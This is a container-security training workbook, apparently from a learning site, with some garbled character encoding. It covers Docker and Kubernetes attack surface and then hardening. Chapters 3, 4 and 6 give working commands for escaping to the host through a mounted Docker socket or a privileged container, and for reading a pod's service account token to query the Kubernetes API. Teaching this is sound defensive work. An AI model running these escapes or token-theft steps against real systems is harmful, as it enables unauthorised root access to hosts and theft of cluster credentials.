Chapter 1 โ€” Container Security Concepts

Containers share the host kernel โ€” they are isolated via namespaces and cgroups, not virtualisation. A container escape equals code execution on the host. Understanding this boundary is the foundation of container security.

Chapter 2 โ€” Docker Architecture & Attack Surface

# Check if you are in a container
cat /proc/1/cgroup     # contains "docker" if containerised
ls /.dockerenv         # present in Docker containers

# Check capabilities (excessive caps = escape vector)
capsh --print
cat /proc/self/status | grep Cap

Chapter 3 โ€” Docker Socket Abuse

# If docker.sock is mounted in the container
ls /var/run/docker.sock

# Escape via mounted socket
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
# You now have root on the host

Chapter 4 โ€” Container Escapes

# Check if privileged
cat /proc/self/status | grep CapEff
# fdbb = full capabilities = privileged mode

# Mount host filesystem from privileged container
mkdir /tmp/host && mount /dev/sda1 /tmp/host
chroot /tmp/host

# CAP_SYS_ADMIN escape via cgroup release_agent (see Docker Container Escape lab)

Chapter 5 โ€” Image Security Analysis

# Analyse image layers for secrets
dive IMAGE_NAME

# Scan for CVEs
trivy image nginx:latest

# Check image history for exposed secrets
docker history IMAGE --no-trunc

# Extract filesystem from image
docker save IMAGE | tar -xvf -

Chapter 6 โ€” Kubernetes Security Basics

# Check RBAC permissions
kubectl auth can-i --list

# Access K8s API from inside a pod using the service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
curl -k https://kubernetes.default.svc/api/v1/namespaces -H "Authorization: Bearer TOKEN"

Chapter 7 โ€” Container Runtime Security

Falco monitors container syscalls in real-time and alerts on suspicious behaviour: spawning shells, reading /etc/shadow, mounting sensitive directories, unexpected network connections from containers. Deploy it as the IDS for your container environment.

Chapter 8 โ€” Secure Containerisation

Never run as root. Use read-only filesystems. Drop all capabilities and add only what is needed. Never mount the Docker socket into containers. Use distroless base images. Scan images in CI/CD. Set resource limits. Use network policies in Kubernetes. Regularly rotate and pin image digests.

โœ…
Workbook complete! You've covered all chapters. Mark it complete below and continue your learning path.
โ† All Workbooks
๐Ÿ“–
Sign in to track progress